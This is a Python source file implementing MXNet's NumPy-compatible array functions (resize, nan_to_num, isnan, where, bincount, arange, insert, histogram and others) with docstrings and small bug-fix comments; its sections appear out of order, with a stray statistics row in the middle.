    # (`if (prepend or append)`) silently ignored falsy values such as 0 and
    # could raise an ambiguous-truth error for multi-element ndarrays.
    if prepend is not None or append is not None:
        raise NotImplementedError('prepend and append options are not supported yet')
    return _npi.diff(a, n=n, axis=axis)
@set_module('mxnet.ndarray.numpy')
def resize(a, new_shape):
    """
    Return a new array with the specified shape.

    If the new array is larger than the original array, then the new array is
    filled with repeated copies of `a`. Note that this behavior is different
    from a.resize(new_shape) which fills with zeros instead of repeated
    copies of `a`.

    Parameters
    ----------
    a : ndarray
        Array to be resized.
    new_shape : int or tuple of int
        Shape of resized array.

    Returns
    -------
    reshaped_array : ndarray
        The new array is formed from the data in the old array, repeated if
        necessary to fill out the required number of elements. The data are
        repeated in the order that they are stored in memory.

    See Also
    --------
    ndarray.resize : resize an array in-place.

    Notes
    -----
    Warning: This functionality does **not** consider axes separately, i.e.
    it does not apply interpolation/extrapolation. It fills the return array
    with the required number of elements, taken from `a` as they are laid
    out in memory, disregarding strides and axes. (This is in case the new
    shape is smaller; for larger, see above.) It is therefore not suitable
    to resize images, or data where each axis represents a separate and
    distinct entity.

    Examples
    --------
    >>> a = np.array([[0, 1], [2, 3]])
    >>> np.resize(a, (2, 3))
    array([[0., 1., 2.],
           [3., 0., 1.]])
    >>> np.resize(a, (1, 4))
    array([[0., 1., 2., 3.]])
    >>> np.resize(a,(2, 4))
    array([[0., 1., 2., 3.],
           [0., 1., 2., 3.]])
    """
    # Delegated to a CPU fallback op in the backend.
    resized = _npi.resize_fallback(a, new_shape=new_shape)
    return resized
@set_module('mxnet.ndarray.numpy')
def nan_to_num(x, copy=True, nan=0.0, posinf=None, neginf=None, **kwargs):
    """
    Replace NaN with zero and infinity with large finite numbers (default
    behaviour) or with the numbers defined by the user using the `nan`,
    `posinf` and/or `neginf` keywords.

    If `x` is inexact, NaN is replaced by zero or by the user defined value
    in `nan` keyword, infinity is replaced by the largest finite floating
    point value representable by ``x.dtype`` or by the user defined value in
    `posinf` keyword, and -infinity is replaced by the most negative finite
    floating point value representable by ``x.dtype`` or by the user defined
    value in `neginf` keyword.

    If `x` is not inexact, then no replacements are made.

    Parameters
    ----------
    x : scalar or ndarray
        Input data.
    copy : bool, optional
        Whether to create a copy of `x` (True) or to replace values in-place
        (False). Default is True.
    nan : int, float, optional
        Value used to fill NaN values. Defaults to 0.0.
    posinf : int, float, optional
        Value used to fill positive infinity values. If not given, positive
        infinity values are replaced with a very large number.
    neginf : int, float, optional
        Value used to fill negative infinity values. If not given, negative
        infinity values are replaced with a very small (or negative) number.

    Returns
    -------
    out : ndarray
        `x`, with the non-finite values replaced. If `copy` is False, this
        may be `x` itself.

    Raises
    ------
    TypeError
        If `x` is neither a numeric scalar nor an NDArray.

    Notes
    -----
    NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
    (IEEE 754). This means that Not a Number is not equivalent to infinity.

    Examples
    --------
    >>> np.nan_to_num(np.inf)
    1.7976931348623157e+308
    >>> np.nan_to_num(-np.inf)
    -1.7976931348623157e+308
    >>> np.nan_to_num(np.nan)
    0.0
    >>> x = np.array([np.inf, -np.inf, np.nan, -128, 128])
    >>> np.nan_to_num(x)
    array([ 3.4028235e+38, -3.4028235e+38,  0.0000000e+00, -1.2800000e+02,
            1.2800000e+02])
    >>> np.nan_to_num(x, nan=-9999, posinf=33333333, neginf=33333333)
    array([ 3.3333332e+07,  3.3333332e+07, -9.9990000e+03, -1.2800000e+02,
            1.2800000e+02])
    """
    # Python scalars take the pure-numpy path.
    if isinstance(x, numeric_types):
        return _np.nan_to_num(x, copy, nan, posinf, neginf)
    if not isinstance(x, NDArray):
        raise TypeError('type {} not supported'.format(str(type(x))))
    # Integer dtypes cannot hold NaN/inf, so there is nothing to replace.
    if x.dtype in ['int8', 'uint8', 'int32', 'int64']:
        return x
    # In-place operation writes back into x; otherwise a new array is allocated.
    target = None if copy else x
    return _npi.nan_to_num(x, copy=copy, nan=nan, posinf=posinf, neginf=neginf, out=target)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isnan(x, out=None, **kwargs):
    """
    Test element-wise for NaN and return result as a boolean array.

    Parameters
    ----------
    x : ndarray
        Input array.
    out : ndarray or None, optional
        A location into which the result is stored.
        If provided, it must have the same shape and dtype as input ndarray.
        If not provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray or bool
        True where x is NaN, false otherwise.
        This is a scalar if x is a scalar.

    Notes
    -----
    NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754).

    This function differs from the original `numpy.isnan
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.isnan.html>`_ in
    the following aspects:

    - Does not support complex number for now
    - Input type does not support Python native iterables(list, tuple, ...).
    - ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
    - ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
    - ``out`` param does not support scalar input case.

    Examples
    --------
    >>> np.isnan(np.nan)
    True
    >>> np.isnan(np.inf)
    False
    >>> np.isnan(np.array([np.log(-1.),1.,np.log(0)]))
    array([ True, False, False])
    """
    return _unary_func_helper(x, _npi.isnan, _np.isnan, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isinf(x, out=None, **kwargs):
    """
    Test element-wise for positive or negative infinity.

    Parameters
    ----------
    x : ndarray
        Input array.
    out : ndarray or None, optional
        A location into which the result is stored.
        If provided, it must have the same shape and dtype as input ndarray.
        If not provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray or bool
        True where x is positive or negative infinity, false otherwise.
        This is a scalar if x is a scalar.

    Notes
    -----
    NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754).
    This means that Not a Number is not equivalent to infinity.

    This function differs from the original `numpy.isinf
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.isinf.html>`_ in
    the following aspects:

    - Does not support complex number for now
    - Input type does not support Python native iterables(list, tuple, ...).
    - ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
    - ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
    - ``out`` param does not support scalar input case.

    Examples
    --------
    >>> np.isinf(np.inf)
    True
    >>> np.isinf(np.nan)
    False
    >>> np.isinf(np.array([np.inf, -np.inf, 1.0, np.nan]))
    array([ True,  True, False, False])
    >>> x = np.array([-np.inf, 0., np.inf])
    >>> y = np.array([True, True, True], dtype=np.bool_)
    >>> np.isinf(x, y)
    array([ True, False,  True])
    >>> y
    array([ True, False,  True])
    """
    return _unary_func_helper(x, _npi.isinf, _np.isinf, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isposinf(x, out=None, **kwargs):
    """
    Test element-wise for positive infinity, return result as bool array.

    Parameters
    ----------
    x : ndarray
        Input array.
    out : ndarray or None, optional
        A location into which the result is stored.
        If provided, it must have the same shape and dtype as input ndarray.
        If not provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray or bool
        True where x is positive infinity, false otherwise.
        This is a scalar if x is a scalar.

    Notes
    -----
    NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754).
    This means that Not a Number is not equivalent to infinity.

    Examples
    --------
    >>> np.isposinf(np.inf)
    True
    >>> np.isposinf(-np.inf)
    False
    >>> np.isposinf(np.nan)
    False
    >>> np.isposinf(np.array([-np.inf, 0., np.inf]))
    array([False, False,  True])
    >>> x = np.array([-np.inf, 0., np.inf])
    >>> y = np.array([True, True, True], dtype=np.bool)
    >>> np.isposinf(x, y)
    array([False, False,  True])
    >>> y
    array([False, False,  True])
    """
    # @set_module was missing here while every sibling (isinf, isneginf,
    # isfinite) has it; added so __module__ reports the public namespace
    # consistently.
    return _unary_func_helper(x, _npi.isposinf, _np.isposinf, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isneginf(x, out=None, **kwargs):
    """
    Test element-wise for negative infinity, return result as bool array.

    Parameters
    ----------
    x : ndarray
        Input array.
    out : ndarray or None, optional
        A location into which the result is stored.
        If provided, it must have the same shape and dtype as input ndarray.
        If not provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray or bool
        True where x is negative infinity, false otherwise.
        This is a scalar if x is a scalar.

    Notes
    -----
    NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754).
    This means that Not a Number is not equivalent to infinity.

    Examples
    --------
    >>> np.isneginf(-np.inf)
    True
    >>> np.isneginf(np.inf)
    False
    >>> np.isneginf(float('-inf'))
    True
    >>> np.isneginf(np.array([-np.inf, 0., np.inf]))
    array([ True, False, False])
    >>> x = np.array([-np.inf, 0., np.inf])
    >>> y = np.array([True, True, True], dtype=np.bool)
    >>> np.isneginf(x, y)
    array([ True, False, False])
    >>> y
    array([ True, False, False])
    """
    # Dispatch: ndarray inputs go to the backend op, scalars to pure numpy.
    helper_args = (x, _npi.isneginf, _np.isneginf)
    return _unary_func_helper(*helper_args, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isfinite(x, out=None, **kwargs):
    """
    Test element-wise for finiteness (not infinity or not Not a Number).

    Parameters
    ----------
    x : ndarray
        Input array.
    out : ndarray or None, optional
        A location into which the result is stored.
        If provided, it must have the same shape and dtype as input ndarray.
        If not provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    y : ndarray or bool
        True where x is finite (neither NaN nor positive/negative infinity),
        false otherwise.
        This is a scalar if x is a scalar.

    Notes
    -----
    Not a Number, positive infinity and negative infinity are considered to be non-finite.

    NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754).
    This means that Not a Number is not equivalent to infinity.
    Also that positive infinity is not equivalent to negative infinity.
    But infinity is equivalent to positive infinity. Errors result if the second argument
    is also supplied when x is a scalar input, or if first and second arguments have different shapes.

    Examples
    --------
    >>> np.isfinite(1)
    True
    >>> np.isfinite(0)
    True
    >>> np.isfinite(np.nan)
    False
    >>> np.isfinite(np.inf)
    False
    >>> np.isfinite(-np.inf)
    False
    >>> np.isfinite(np.array([np.log(-1.),1.,np.log(0)]))
    array([False,  True, False])
    >>> x = np.array([-np.inf, 0., np.inf])
    >>> y = np.array([True, True, True], dtype=np.bool)
    >>> np.isfinite(x, y)
    array([False,  True, False])
    >>> y
    array([False,  True, False])
    """
    return _unary_func_helper(x, _npi.isfinite, _np.isfinite, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
def where(condition, x=None, y=None):  # pylint: disable=too-many-return-statements
    """where(condition, [x, y])
    Return elements chosen from ``x`` or ``y`` depending on ``condition``.
    When only ``condition`` is given this is shorthand for
    ``np.asarray(condition).nonzero()``. Otherwise ``x``, ``y`` and
    ``condition`` must be broadcastable to a common shape and ``x``/``y``
    must share a dtype.
    Parameters
    ----------
    condition : ndarray
        Where True, yield ``x``, otherwise yield ``y``.
    x, y : ndarray
        Values from which to choose.
    Returns
    -------
    out : ndarray
        Array with elements from ``x`` where ``condition`` is True and
        elements from ``y`` elsewhere.
    Notes
    -----
    Differences from official NumPy:
    - A scalar ``condition`` returns ``x`` or ``y`` directly, without broadcasting.
    - If ``condition`` is an ndarray while both ``x`` and ``y`` are scalars,
      the output dtype is float32.
    """
    if x is None and y is None:
        return nonzero(condition)
    if isinstance(condition, numeric_types):
        # Scalar condition: select one operand directly, no broadcasting.
        return y if condition == 0 else x
    x_is_tensor = isinstance(x, NDArray)
    y_is_tensor = isinstance(y, NDArray)
    if x_is_tensor and y_is_tensor:
        return _npi.where(condition, x, y, out=None)
    if x_is_tensor:
        return _npi.where_rscalar(condition, x, float(y), out=None)
    if y_is_tensor:
        return _npi.where_lscalar(condition, y, float(x), out=None)
    if isinstance(x, numeric_types) and isinstance(y, numeric_types):
        return _npi.where_scalar2(condition, float(x), float(y), out=None)
    raise TypeError('type {0} and {1} not supported'.format(str(type(x)), str(type(y))))
@set_module('mxnet.ndarray.numpy')
def polyval(p, x):
    """
    Evaluate a polynomial at specific values.
    For coefficients ``p`` of length N, computes
    ``p[0]*x**(N-1) + p[1]*x**(N-2) + ... + p[N-2]*x + p[N-1]``
    for each element of ``x``.
    Parameters
    ----------
    p : ndarray
        1D array of polynomial coefficients, highest degree first.
    x : ndarray
        Points at which to evaluate the polynomial.
    Returns
    -------
    values : ndarray
        Polynomial values at ``x``.
    Notes
    -----
    Unlike official NumPy this does not support poly1d, and ``x`` must be an
    ndarray even for a single point. Mixing ndarray and non-ndarray arguments
    raises TypeError.
    """
    from ...numpy import ndarray
    p_is_nd = isinstance(p, ndarray)
    x_is_nd = isinstance(x, ndarray)
    if p_is_nd and x_is_nd:
        return _npi.polyval(p, x)
    if not p_is_nd and not x_is_nd:
        # pure NumPy inputs: fall back to the official implementation
        return _np.polyval(p, x)
    raise TypeError('type not supported')
@set_module('mxnet.ndarray.numpy')
def bincount(x, weights=None, minlength=0):
    """
    Count number of occurrences of each value in array of non-negative ints.
    Parameters
    ----------
    x : ndarray
        Input array, 1 dimension, nonnegative ints.
    weights : ndarray, optional
        Weights, same shape as x.
    minlength : int, optional
        A minimum number of bins for the output; must be non-negative.
    Returns
    -------
    out : ndarray
        The result of binning the input array; length is ``amax(x) + 1``
        (or ``minlength``, whichever is larger).
    Raises
    ------
    TypeError
        If ``x`` is not an NDArray.
    ValueError
        If ``minlength`` is negative.
    Examples
    --------
    >>> np.bincount(np.arange(5))
    array([1, 1, 1, 1, 1])
    >>> w = np.array([0.3, 0.5, 0.2, 0.7, 1., -0.6]) # weights
    >>> x = np.array([0, 1, 1, 2, 2, 2])
    >>> np.bincount(x, weights=w)
    array([ 0.3,  0.7,  1.1])
    """
    if not isinstance(x, NDArray):
        # fixed typo: "NDarray" -> "NDArray"
        raise TypeError("Input data should be NDArray")
    if minlength < 0:
        # minlength == 0 is the valid default; only negative values are
        # rejected.  The old message ("should greater than 0") claimed
        # otherwise and was ungrammatical.
        raise ValueError("minlength must be non-negative")
    if weights is None:
        return _npi.bincount(x, minlength=minlength, has_weights=False)
    return _npi.bincount(x, weights=weights, minlength=minlength, has_weights=True)
| 33.558652 | 141 | 0.604846 |
import numpy as _np
from ...base import numeric_types, integer_types
from ...util import _sanity_check_params, set_module
from ...util import wrap_np_unary_func, wrap_np_binary_func
from ...context import current_context
from . import _internal as _npi
from ..ndarray import NDArray
# Public API of this module: the NumPy-compatible operator namespace
# implemented on top of MXNet ndarrays.
__all__ = ['shape', 'zeros', 'zeros_like', 'ones', 'ones_like', 'full', 'full_like', 'empty_like', 'invert', 'delete',
           'add', 'broadcast_to', 'subtract', 'multiply', 'divide', 'mod', 'remainder', 'power', 'bitwise_not',
           'arctan2', 'sin', 'cos', 'tan', 'sinh', 'cosh', 'tanh', 'log10', 'sqrt', 'cbrt', 'abs', 'insert',
           'absolute', 'exp', 'expm1', 'arcsin', 'arccos', 'arctan', 'sign', 'log', 'degrees', 'log2', 'matmul',
           'log1p', 'rint', 'radians', 'reciprocal', 'square', 'negative', 'fix', 'ceil', 'floor', 'histogram',
           'trunc', 'logical_not', 'arcsinh', 'arccosh', 'arctanh', 'argsort', 'sort',
           'tensordot', 'eye', 'linspace',
           'logspace', 'expand_dims', 'tile', 'arange', 'array_split', 'split', 'hsplit', 'vsplit', 'dsplit',
           'concatenate', 'append', 'stack', 'vstack', 'row_stack', 'column_stack', 'hstack', 'dstack',
           'average', 'mean', 'maximum', 'minimum',
           'swapaxes', 'clip', 'argmax', 'argmin', 'std', 'var', 'indices', 'copysign', 'ravel', 'unravel_index',
           'diag_indices_from', 'hanning', 'hamming', 'blackman', 'flip', 'flipud', 'fliplr', 'around', 'round',
           'hypot', 'bitwise_and', 'bitwise_xor', 'bitwise_or', 'rad2deg', 'deg2rad', 'unique', 'lcm',
           'tril', 'identity', 'take', 'ldexp', 'vdot', 'inner', 'outer',
           'equal', 'not_equal', 'greater', 'less', 'greater_equal', 'less_equal', 'rot90', 'einsum',
           'true_divide', 'nonzero', 'quantile', 'percentile', 'shares_memory', 'may_share_memory',
           'diff', 'resize', 'polyval', 'nan_to_num', 'isnan', 'isinf', 'isposinf', 'isneginf', 'isfinite',
           'where', 'bincount']
@set_module('mxnet.ndarray.numpy')
def shape(a):
    """Return the shape of ``a`` (simply reads ``a.shape``)."""
    return a.shape
@set_module('mxnet.ndarray.numpy')
def zeros(shape, dtype=_np.float32, order='C', ctx=None):
    """Return a new array of the given shape, filled with zeros.

    Only C order is supported; ``dtype`` defaults to float32 and ``ctx``
    to the current context.
    """
    if order != 'C':
        raise NotImplementedError
    target_dtype = _np.float32 if dtype is None else dtype
    target_ctx = current_context() if ctx is None else ctx
    return _npi.zeros(shape=shape, ctx=target_ctx, dtype=target_dtype)
@set_module('mxnet.ndarray.numpy')
def ones(shape, dtype=_np.float32, order='C', ctx=None):
    """Return a new array of the given shape, filled with ones (C order only)."""
    if order != 'C':
        raise NotImplementedError
    if dtype is None:
        dtype = _np.float32
    if ctx is None:
        ctx = current_context()
    return _npi.ones(shape=shape, ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def zeros_like(a, dtype=None, order='C', ctx=None, out=None):
    """Return an array of zeros with the same shape (and, unless ``dtype`` is given, type) as ``a``."""
    if order != 'C':
        raise NotImplementedError
    if ctx is None:
        ctx = current_context()
    return _npi.full_like(a, fill_value=0, dtype=dtype, ctx=ctx, out=out)
@set_module('mxnet.ndarray.numpy')
def ones_like(a, dtype=None, order='C', ctx=None, out=None):
    """Return an array of ones with the same shape (and, unless ``dtype`` is given, type) as ``a``."""
    if order != 'C':
        raise NotImplementedError
    if ctx is None:
        ctx = current_context()
    return _npi.full_like(a, fill_value=1, dtype=dtype, ctx=ctx, out=out)
@set_module('mxnet.ndarray.numpy')
def broadcast_to(array, shape):
    """Broadcast ``array`` (or a scalar) to the given shape."""
    if _np.isscalar(array):
        # A scalar has nothing to broadcast: materialize it with full().
        return full(shape, array)
    return _npi.broadcast_to(array, shape)
@set_module('mxnet.ndarray.numpy')
def full(shape, fill_value, dtype=None, order='C', ctx=None, out=None):
    """Return a new array of the given shape, filled with ``fill_value``.

    ``fill_value`` may be a scalar or an ndarray; an ndarray fill value is
    broadcast to ``shape`` (and cast when ``dtype`` is given). Only C order
    is supported.
    """
    if order != 'C':
        raise NotImplementedError
    if ctx is None:
        ctx = current_context()
    if isinstance(fill_value, NDArray):
        broadcasted = broadcast_to(fill_value, shape)
        return broadcasted if dtype is None else broadcasted.astype(dtype)
    if dtype is None:
        dtype = _np.float32
    return _npi.full(shape=shape, value=fill_value, ctx=ctx, dtype=dtype, out=out)
@set_module('mxnet.ndarray.numpy')
def full_like(a, fill_value, dtype=None, order='C', ctx=None, out=None):
    """Return a full array with the same shape (and, unless ``dtype`` is given, type) as ``a``."""
    if order != 'C':
        raise NotImplementedError
    if ctx is None:
        ctx = current_context()
    return _npi.full_like(a, fill_value=fill_value, dtype=dtype, ctx=ctx, out=out)
@set_module('mxnet.ndarray.numpy')
def empty_like(prototype, dtype=None, order='C', subok=False, shape=None):
    """Return an uninitialized array with the same shape and type as ``prototype``.

    Only C order is supported; ``subok`` and ``shape`` must be left at their
    defaults. ``dtype`` may be a string or one of the types in ``dtype_list``.
    """
    # Maps the supported dtype objects to the string names the backend expects.
    dtype_list = {None:'None', _np.int8:'int8', _np.uint8:'uint8', _np.int32:'int32',
                  _np.int64:'int64', _np.float16:'float16', _np.float32:'float32',
                  _np.float64:'float64', _np.bool_:'bool_', bool:'bool', int:'int64', float:'float64'}
    if order != 'C':
        raise NotImplementedError("Only support C-order at this moment")
    if subok:
        raise NotImplementedError("Creating array by using sub-class is not supported at this moment")
    if shape is not None:
        raise NotImplementedError("Assigning new shape is not supported at this moment")
    try:
        dtype = dtype if isinstance(dtype, str) else dtype_list[dtype]
    except (KeyError, TypeError):
        # Narrowed from a bare `except:` (which also caught KeyboardInterrupt /
        # SystemExit). KeyError covers unknown dtypes, TypeError unhashable ones.
        raise NotImplementedError("Do not support this dtype at this moment") from None
    return _npi.empty_like_fallback(prototype, dtype=dtype, order=order, subok=subok, shape=shape)
@set_module('mxnet.ndarray.numpy')
def arange(start, stop=None, step=1, dtype=None, ctx=None):
    """Return evenly spaced values within ``[start, stop)`` with the given ``step``.

    With a single argument, ``arange(n)`` counts from 0 to ``n``. ``dtype``
    defaults to float32.

    Raises
    ------
    ValueError
        If both ``start`` and ``stop`` are None.
    ZeroDivisionError
        If ``step`` is 0.
    """
    # Validate BEFORE the stop/start swap below: previously `arange(None)`
    # rewrote stop=None/start=0 first, so this check could never fire and
    # None was passed through to the backend.
    if start is None and stop is None:
        raise ValueError('start and stop cannot be both None')
    if dtype is None:
        dtype = 'float32'
    if ctx is None:
        ctx = current_context()
    if stop is None:
        # single-argument form: arange(n) == arange(0, n)
        stop = start
        start = 0
    if step is None:
        step = 1
    if step == 0:
        raise ZeroDivisionError('step cannot be 0')
    return _npi.arange(start=start, stop=stop, step=step, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def identity(n, dtype=None, ctx=None):
    """Return the ``n x n`` identity array (float32 by default)."""
    if not isinstance(n, int):
        raise TypeError("Input 'n' should be an integer")
    if n < 0:
        raise ValueError("Input 'n' cannot be negative")
    if ctx is None:
        ctx = current_context()
    dtype = _np.float32 if dtype is None else dtype
    return _npi.identity(shape=(n, n), ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def take(a, indices, axis=None, mode='raise', out=None):
    """Take elements from ``a`` along ``axis``; ``a`` is flattened when ``axis`` is None."""
    if mode not in ('wrap', 'clip', 'raise'):
        raise NotImplementedError(
            "function take does not support mode '{}'".format(mode))
    if axis is None:
        # numpy semantics: no axis means index into the flattened array
        return _npi.take(_npi.reshape(a, -1), indices, 0, mode, out)
    else:
        return _npi.take(a, indices, axis, mode, out)
@set_module('mxnet.ndarray.numpy')
def insert(arr, obj, values, axis=None):
    """Insert ``values`` into ``arr`` before the position(s) given by ``obj``.

    ``obj`` may be an int, a slice, or an NDArray of indices; ``values`` may
    be a scalar or an NDArray. Dispatches to the matching ``_npi.insert_*`` op.
    """
    # Scalar ``values`` take a fast path that skips the type checks below.
    if isinstance(values, numeric_types):
        if isinstance(obj, slice):
            start = obj.start
            stop = obj.stop
            step = 1 if obj.step is None else obj.step
            return _npi.insert_slice(arr, val=values, start=start, stop=stop, step=step, axis=axis)
        elif isinstance(obj, integer_types):
            return _npi.insert_scalar(arr, val=values, int_ind=obj, axis=axis)
        elif isinstance(obj, NDArray):
            return _npi.insert_tensor(arr, obj, val=values, axis=axis)
    # Tensor ``values``: validate both operands, then dispatch on ``obj``.
    if not isinstance(arr, NDArray):
        raise TypeError("'arr' can not support type {}".format(str(type(arr))))
    if not isinstance(values, NDArray):
        raise TypeError("'values' can not support type {}".format(str(type(values))))
    if isinstance(obj, slice):
        start = obj.start
        stop = obj.stop
        step = 1 if obj.step is None else obj.step
        return _npi.insert_slice(arr, values, start=start, stop=stop, step=step, axis=axis)
    elif isinstance(obj, integer_types):
        return _npi.insert_scalar(arr, values, int_ind=obj, axis=axis)
    elif isinstance(obj, NDArray):
        return _npi.insert_tensor(arr, values, obj, axis=axis)
    else:
        raise TypeError("'obj' can not support type {}".format(str(type(obj))))
def _ufunc_helper(lhs, rhs, fn_array, fn_scalar, lfn_scalar, rfn_scalar=None, out=None):
    """Dispatch a binary ufunc to the right kernel by operand types.

    ``fn_scalar`` handles scalar-scalar, ``lfn_scalar`` ndarray-op-scalar,
    ``rfn_scalar`` scalar-op-ndarray (``lfn_scalar`` is reused when
    ``rfn_scalar`` is None, i.e. for commutative ops), and ``fn_array``
    ndarray-op-ndarray.
    """
    from ...numpy import ndarray
    if isinstance(lhs, numeric_types):
        if isinstance(rhs, numeric_types):
            return fn_scalar(lhs, rhs, out=out)
        else:
            if rfn_scalar is None:
                # commutative operation: the left-scalar kernel suffices
                return lfn_scalar(rhs, float(lhs), out=out)
            else:
                return rfn_scalar(rhs, float(lhs), out=out)
    elif isinstance(rhs, numeric_types):
        return lfn_scalar(lhs, float(rhs), out=out)
    elif isinstance(rhs, ndarray):
        return fn_array(lhs, rhs, out=out)
    else:
        raise TypeError('type {} not supported'.format(str(type(rhs))))
@set_module('mxnet.ndarray.numpy')
def unique(ar, return_index=False, return_inverse=False, return_counts=False, axis=None):
    """Find the sorted unique elements of ``ar``; optionally also indices/inverse/counts."""
    ret = _npi.unique(ar, return_index, return_inverse, return_counts, axis)
    if isinstance(ret, list):
        # multiple outputs requested -> return them as a tuple, numpy-style
        return tuple(ret)
    else:
        return ret
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def add(x1, x2, out=None, **kwargs):
    """Element-wise addition; either operand may be a scalar."""
    return _ufunc_helper(x1, x2, _npi.add, _np.add, _npi.add_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def subtract(x1, x2, out=None, **kwargs):
    """Element-wise subtraction; either operand may be a scalar."""
    return _ufunc_helper(x1, x2, _npi.subtract, _np.subtract, _npi.subtract_scalar,
                         _npi.rsubtract_scalar, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def multiply(x1, x2, out=None, **kwargs):
    """Element-wise multiplication; either operand may be a scalar."""
    return _ufunc_helper(x1, x2, _npi.multiply, _np.multiply, _npi.multiply_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def divide(x1, x2, out=None, **kwargs):
    """Element-wise true division; either operand may be a scalar."""
    return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide, _npi.true_divide_scalar,
                         _npi.rtrue_divide_scalar, out)
@set_module('mxnet.ndarray.numpy')
def true_divide(x1, x2, out=None):
    """Element-wise true division (same kernels as ``divide``)."""
    return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide, _npi.true_divide_scalar,
                         _npi.rtrue_divide_scalar, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def mod(x1, x2, out=None, **kwargs):
    """Element-wise remainder of division."""
    return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar, _npi.rmod_scalar, out)
@set_module('mxnet.ndarray.numpy')
def delete(arr, obj, axis=None):
    """Return a new array with the sub-arrays selected by ``obj`` removed along ``axis``."""
    if not isinstance(arr, NDArray):
        raise TypeError("'arr' can not support type {}".format(str(type(arr))))
    if isinstance(obj, slice):
        start = obj.start
        stop = obj.stop
        step = 1 if obj.step is None else obj.step
        return _npi.delete(arr, start=start, stop=stop, step=step, axis=axis)
    elif isinstance(obj, integer_types):
        return _npi.delete(arr, int_ind=obj, axis=axis)
    elif isinstance(obj, NDArray):
        return _npi.delete(arr, obj, axis=axis)
    else:
        raise TypeError("'obj' can not support type {}".format(str(type(obj))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def matmul(a, b, out=None):
    """Matrix product of two arrays (delegates to ``_npi.matmul``)."""
    return _npi.matmul(a, b, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def remainder(x1, x2, out=None):
    """Element-wise remainder of division; same kernels as ``mod``."""
    return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar, _npi.rmod_scalar, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def power(x1, x2, out=None, **kwargs):
    """First array elements raised to powers from the second array, element-wise."""
    return _ufunc_helper(x1, x2, _npi.power, _np.power, _npi.power_scalar, _npi.rpower_scalar, out)
@set_module('mxnet.ndarray.numpy')
def argsort(a, axis=-1, kind=None, order=None):
    """Return indices (int64) that would sort ``a`` ascending along ``axis``.

    ``kind`` is accepted for numpy compatibility but ignored.
    """
    if order is not None:
        raise NotImplementedError("order not supported here")
    return _npi.argsort(data=a, axis=axis, is_ascend=True, dtype='int64')
@set_module('mxnet.ndarray.numpy')
def sort(a, axis=-1, kind=None, order=None):
    """Return a copy of ``a`` sorted ascending along ``axis`` (``kind`` is ignored)."""
    if order is not None:
        raise NotImplementedError("order not supported here")
    return _npi.sort(data=a, axis=axis, is_ascend=True)
@set_module('mxnet.ndarray.numpy')
def tensordot(a, b, axes=2):
    """Compute the tensor dot product of ``a`` and ``b`` along the given axes.

    ``axes`` may be an integer (sum over the last N axes of ``a`` and the
    first N of ``b``) or a pair of axis sequences of equal length.
    """
    if _np.isscalar(axes):
        return _npi.tensordot_int_axes(a, b, axes)
    if len(axes) != 2:
        raise ValueError('Axes must consist of two arrays.')
    a_axes, b_axes = axes
    # Normalize single-axis shorthand to 1-tuples.
    if _np.isscalar(a_axes):
        a_axes = (a_axes,)
    if _np.isscalar(b_axes):
        b_axes = (b_axes,)
    if len(a_axes) != len(b_axes):
        raise ValueError('Axes length mismatch')
    return _npi.tensordot(a, b, a_axes, b_axes)
@set_module('mxnet.ndarray.numpy')
def histogram(a, bins=10, range=None, normed=None, weights=None, density=None):
    """Compute the histogram of ``a``.

    Only an integer bin count (with an explicit ``range``) or an NDArray of
    bin edges is supported; ``normed``, ``weights`` and ``density`` are not.
    """
    if normed is True:
        raise NotImplementedError("normed is not supported yet...")
    if weights is not None:
        raise NotImplementedError("weights is not supported yet...")
    if density is True:
        raise NotImplementedError("density is not supported yet...")
    if isinstance(bins, numeric_types):
        if range is None:
            raise NotImplementedError("automatic range is not supported yet...")
        return _npi.histogram(a, bin_cnt=bins, range=range)
    if isinstance(bins, (list, tuple)):
        raise NotImplementedError("array_like bins is not supported yet...")
    if isinstance(bins, str):
        raise NotImplementedError("string bins is not supported yet...")
    if isinstance(bins, NDArray):
        return _npi.histogram(a, bins=bins)
    # NOTE(review): two-argument ValueError produces a tuple message — confirm intended.
    raise ValueError("np.histogram fails with", locals())
